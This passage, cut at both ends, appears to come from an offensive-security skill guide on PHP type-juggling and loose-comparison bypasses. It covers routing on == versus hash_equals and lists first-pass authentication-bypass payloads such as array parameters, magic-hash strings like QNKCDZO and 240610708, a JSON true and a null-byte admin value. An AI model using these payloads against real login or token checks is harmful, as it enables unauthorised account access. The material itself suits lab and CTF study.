), HMAC/hash loose checks, NULL from bad types, and CTF-style
strcmp
/
json_decode
/
intval
tricks. Use strict routing: map the sink (
==
vs
hash_equals
), PHP major version, and whether both operands are attacker-controlled. Routing note: when you encounter PHP login/signature logic or code like
md5($_GET['x'])==md5($_GET['y'])
, start with this skill; if
hash_equals
/
===
is already used, this path usually does not apply.
0. QUICK START
First-pass goal
prove the server branch treats unequal secrets/tokens as equal via coercion, not guess the real password.
First-pass payloads (auth / token shape)
password[]=x
password=
0
0e12345
240610708
QNKCDZO
true
[]
{"password":true}
admin%00
Minimal PHP probes (local or
php -r
in lab)